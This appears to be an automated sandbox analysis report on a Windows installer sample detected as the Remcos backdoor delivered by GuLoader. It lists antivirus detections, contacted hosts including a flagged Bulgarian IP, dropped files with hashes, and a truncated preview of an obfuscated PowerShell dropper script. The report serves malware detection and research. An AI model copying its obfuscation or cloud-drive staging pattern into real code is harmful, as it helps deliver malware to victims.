            WtZl31OLfA.exe72%VirustotalBrowse
            WtZl31OLfA.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe58%ReversingLabsWin32.Backdoor.Remcos
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.skinstudio.netG0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.78
            truefalse
              high
              drive.usercontent.google.com
              172.217.16.129
              truefalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.google.commsiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.usercontent.google.com/Amsiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/pscore6lBeqpowershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Iconpowershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.usercontent.google.com/msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/;msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://apis.google.commsiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://nsis.sf.net/NSIS_ErrorErrorWtZl31OLfA.exe, WtZl31OLfA.exe.1.drfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.skinstudio.netGWtZl31OLfA.exe, WtZl31OLfA.exe.1.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.185.78
                                                          drive.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          172.217.16.129
                                                          drive.usercontent.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          87.120.116.187
                                                          unknownBulgaria
                                                          25206UNACS-AS-BG8000BurgasBGtrue
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588308
                                                          Start date and time:2025-01-10 23:48:47 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 3s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:7
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:WtZl31OLfA.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@6/13@2/3
                                                          EGA Information:
                                                          • Successful, ratio: 33.3%
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 79
                                                          • Number of non-executed functions: 48
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 4396 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          TimeTypeDescription
                                                          17:49:39API Interceptor34x Sleep call for process: powershell.exe modified
                                                          17:50:49API Interceptor3600631x Sleep call for process: msiexec.exe modified
                                                          No context
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          UNACS-AS-BG8000BurgasBGC5Zr4LSzmp.exeGet hashmaliciousRedLineBrowse
                                                          • 87.120.120.86
                                                          C5Zr4LSzmp.exeGet hashmaliciousRedLineBrowse
                                                          • 87.120.120.86
                                                          2XnMqJW0u1.exeGet hashmaliciousXWormBrowse
                                                          • 87.120.120.15
                                                          VmoLw6EKj5.exeGet hashmaliciousRedLineBrowse
                                                          • 87.120.120.86
                                                          QwMcsmYcxv.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                          • 87.120.120.15
                                                          QwMcsmYcxv.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                          • 87.120.120.15
                                                          Xf3rn1smZw.exeGet hashmaliciousRedLineBrowse
                                                          • 87.120.120.86
                                                          wqSmINeWgm.exeGet hashmaliciousRedLineBrowse
                                                          • 87.120.120.7
                                                          2eRd5imEKU.exeGet hashmaliciousRedLineBrowse
                                                          • 87.120.120.86
                                                          2eRd5imEKU.exeGet hashmaliciousRedLineBrowse
                                                          • 87.120.120.86
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 142.250.185.78
                                                          • 172.217.16.129
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            TeamViewer_Setup.exeGet hashmaliciousUnknownBrowse
                                                              DHL TAX INVOICES - MARCH 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                REF_17218_VV-0002.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  PO_00290292.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                    teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                                                      teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                                                        SMGS-RCDU5010031.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                          SMGS-RCDU5010031.exeGet hashmaliciousGuLoaderBrowse
                                                                            RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):53158
                                                                              Entropy (8bit):5.062687652912555
                                                                              Encrypted:false
                                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6656
                                                                              Entropy (8bit):5.140229856656103
                                                                              Encrypted:false
                                                                              SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                              MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                              SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                              SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                              SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: 4Vx2rUlb0f.exe, Detection: malicious, Browse
                                                                              • Filename: TeamViewer_Setup.exe, Detection: malicious, Browse
                                                                              • Filename: DHL TAX INVOICES - MARCH 2024.exe, Detection: malicious, Browse
                                                                              • Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse
                                                                              • Filename: PO_00290292.exe, Detection: malicious, Browse
                                                                              • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                              • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                              • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                              • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                              • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):362270
                                                                              Entropy (8bit):1.2455855418607977
                                                                              Encrypted:false
                                                                              SSDEEP:1536:8ISzVYclAygkWLgNhIaJiUYphjwPRryaqA:8bduh6hKUYp5aryaz
                                                                              MD5:9FA2163989C46356E859FEA0B8963C98
                                                                              SHA1:7C4909CBFBFBE47621E33E4FFCBDD07305BFB61A
                                                                              SHA-256:3F02D54A3EC1FECE8CC150F8C9DE04BA12D69A8A221AC97D64161E76E52DF25C
                                                                              SHA-512:39B7C5856903FEA66941551A89E936035C35A98C5B7587F34333626995F4D0A2A1B88E4CAC03865F9785BEF36E272875D84E3CCF221513D7139A4237085021F6
                                                                              Malicious:false
                                                                              Preview:.......c.....W.................X...{..................................c.......................................................>.................................^......y..................B..)....................................................X...........^.......................j.............}.................................%.................;....................................................................................................................f.....................................................................T........E.............................0......................>............................OJ..........................~........................~......G..............................i.s...........a...%........:...........?..........>v...........................................................................................a.,.............................."..................7..........................................).]............................P.................
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):261410
                                                                              Entropy (8bit):1.2549428792982014
                                                                              Encrypted:false
                                                                              SSDEEP:768:Qwiy4uufWUw/8VP6g263Bho3fURSx13Q3pA/988PSEAyx6NQB1lir1f/R/qwV5iw:QDbZBhAUEoIGV/xh5DcPJsc/1si2
                                                                              MD5:37AEF816B4DE967A79095F52FE324B50
                                                                              SHA1:5F77040A1BF5EC66220083597D4FAA06F5FE1B9D
                                                                              SHA-256:3627F4556F8AC2105AB3DC8A5F0C149E1D8DE3520E50447F7F654DA939BA6946
                                                                              SHA-512:D65B2C9B80A825D3C77173E50D3A10F7FDAECCD58E2E385A095DDC2FB97554B8C6E027776333537A3B88226BDEC2A54A9B21E74E138556667E0B6C35491BC2A0
                                                                              Malicious:false
                                                                              Preview:..........................c..........................................................................................................L......................................0......................)....................1D......................R....|.............................................................................c.........................Y..H............{......3...............s.........Z.................!.....{.......................$.............................................J........................,.............[......M...............;....................................................k..2.z...............................s.........R..............................J....g......................................................................................>.....................n....s.......................................................z...........?..................................4............r...............................................................................
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4063), with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):71199
                                                                              Entropy (8bit):5.191883863450341
                                                                              Encrypted:false
                                                                              SSDEEP:1536:Wy50HRVnVGWD9puiJ3liasWArPPOTEzN+goGGTssVRzm:cHHrD2M3AbOWQgoGSs2xm
                                                                              MD5:FE436DB316FBC26E45E0E549EF823194
                                                                              SHA1:A6167E8EDABA364577375393344D64D7D29E5455
                                                                              SHA-256:FD88A6B7F747F43380875AF5FA4EF6B735AFD1C52D0A75D1E14513FCA9F26AD4
                                                                              SHA-512:05E48C88BE028FFA2724EC129DF3B9B2125F4B07AE50A9B8F6010443C94489BDC8FBC533DCABF40D9AFD1B8E0CAD95FAA2C94C10E703C0C63E43ADAAE5BF3868
                                                                              Malicious:true
                                                                              Preview:$Modforanstaltninger=$Vejrkortene;........$Reeksaminationen = @'. Rekvis. I pers$DendrolSBentle,vLdervineIntetkndStyrtsesG llate= Sikred$ Afd ypsOpbygniy OdorabnTyrannisHobbyplpSpartanununciatnTeeterikB gflikt Germa sSluknin; Odys,e.Bo gmesfTaktreguAn oneinParochic Udrenst forsigiGongmano FlannenCholat AfskrkkEYawe.praxerophir CachoutBo klorhEfters,eNon,etenThanatowLysaarsaStilartrAmi ajue ementss Steppe Uklart( Skrive$LeptorrCHeterosyPapirmacAutomatlProxicao agersesReins,itMuggeanoB.yholdmMenusekoDrvtygguBi.dbersOpdra,s, orsel$juttingPTokessalBerkshiu HectowcBkkenbukMyrialii HistrieVedholdr In kri)Merribu f.skesn{Trdepud.Provoca.untragi$ AeolipN FreelaoPycniaan nternmeDet,ctsncal.bratAbmhoo iIndtrngcSuperkaiHoisternHarmonygSt dent Nskedes(JanttysI RadiopnDaaseaafNonmatei ExpedilStatsadtSknderirSeraphiaUslukketCevadinoS ereefrTowmontsUndersl ,icturi'SaalskaFCincinnaOms,ggrg Clodl lSplashir.pholsteDiakron,Thiopyr$PrestidBTesteeseUnrendefD onysioViceam lUnfatedkAcerbernK.nsthiCPlo to
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):327294
                                                                              Entropy (8bit):7.6223354315073255
                                                                              Encrypted:false
                                                                              SSDEEP:6144:TUUzuojppPnxOkKpGoE3HWJhx6nQR94vya2XzSe5R9ECWTCqka:TUUXvnxOkKKERGL2XzSijECWWqN
                                                                              MD5:55AC96F564DC8F6B82FA7E240D6EEE3A
                                                                              SHA1:6B141E40FB89357DDF8F54DFF918689C21883F0D
                                                                              SHA-256:843565DD040BB35626B2C30EEDD8928EFA98FA4C221AC6DA35A350F35FAF270A
                                                                              SHA-512:2A41085CCF49E8E7C8659D2D211042628BC22946F3EA969AC5CD1C5CD089B663C48CEADC7CBD08F5C2DF736F4A2BE10F96B6B968988CA92DB892EF65A8B124DF
                                                                              Malicious:false
                                                                              Preview:.......................ddd.55......i.VVVV.........00...D.............XXX.....)).............[[........................W.......l.....RR.S......Y.r....jjjjj.............9.....n..YY.....CC..............i.....ss............((.......QQ......................`........................U.......RRRR...................ii..........)).Z..S..V.......7.........==........n...............W..............l.CC.......QQQ.............@@.'.........&..................................`.......... ........q..$..........................g.........}..%%%......SS.H...............D.o... ...."..................BB...................B.......Q..pp...................ooo....................~..................`.hhhhh....qq.....................................22.........^^^..rr..................[[.............X.........((........................................YYY.........................).....L....&..........NN........................2.....T.y...aa..................._................@@..........lllll.....................Q...
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Category:dropped
                                                                              Size (bytes):777513
                                                                              Entropy (8bit):7.7705679792239994
                                                                              Encrypted:false
                                                                              SSDEEP:12288:0GCX77iIc2b3mMhkApKwjVim+PMpa3oGk6Rcs93tRLPHj6XOahG:qr75cY2vFikV/oGtR193tJPDUOr
                                                                              MD5:74C8F736D425B1BD2027C2B5B144E188
                                                                              SHA1:76F160D6C55611B99DCD10F85889957CB867990A
                                                                              SHA-256:293EBD610B0542289FFE9A52CAB2C2A434DCFF94918045A5ED1497DEAEE5EB87
                                                                              SHA-512:C859F5D689B168A72DB6FC7FEC5ED3C2A95CBD51402F0128B5370EC0CD41D73E02F90E3B27B85B8D76C5C0140BD9A6D9341D2422673BAA52A5138FF689596162
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@..........................0............@..........................................0...............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):452801
                                                                              Entropy (8bit):1.253535297499313
                                                                              Encrypted:false
                                                                              SSDEEP:1536:R7Kt/6RsOVcDyFtUkKQGef5fnB6vj/MuIqMas+dEgEcn03:DpVZBKsH6vFhMas+nn03
                                                                              MD5:36666AD5AFAD8972D1AC9D4BB141614D
                                                                              SHA1:2F50E39B78F2E1B8B751F61FDDCA0478B8A98274
                                                                              SHA-256:03325F7F88E997850F990A57E7DA4A4A9EDB0597E76110522D8DB6DA14F822E8
                                                                              SHA-512:51AF93E94F43711C7DDC75C08EBA8AD82E36799BAEC3F69572D0FEA349E3F9809D53D07EA6E4A430D46509FE88B923BC1EFDE1F8D414C9CEBBEF731D1C69F818
                                                                              Malicious:false
                                                                              Preview:.................................V..m....[.....................6.....................y....................................................i........................................l..................................1..r........Y.......\........@............p............................................................................................................................[.....?.................................................................................................u.'..........................................................a......)........}.....Z..........................................................................C............................B..............................F...........................................D.............H.............O...........~.....................................................F.......................n.D...........................................................N.................................................t.................7...
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):7.7705679792239994
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:WtZl31OLfA.exe
                                                                              File size:777'513 bytes
                                                                              MD5:74c8f736d425b1bd2027c2b5b144e188
                                                                              SHA1:76f160d6c55611b99dcd10f85889957cb867990a
                                                                              SHA256:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87
                                                                              SHA512:c859f5d689b168a72db6fc7fec5ed3c2a95cbd51402f0128b5370ec0cd41d73e02f90e3b27b85b8d76c5c0140bd9a6d9341d2422673baa52a5138ff689596162
                                                                              SSDEEP:12288:0GCX77iIc2b3mMhkApKwjVim+PMpa3oGk6Rcs93tRLPHj6XOahG:qr75cY2vFikV/oGtR193tJPDUOr
                                                                              TLSH:0BF4E0B3DF396522ED4898B2E42B1DF7977444728A55E8133152BC37F9249A6EE0C20F
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@
                                                                              Icon Hash:b2b3aeb696aefe9e
                                                                              Entrypoint:0x4032a0
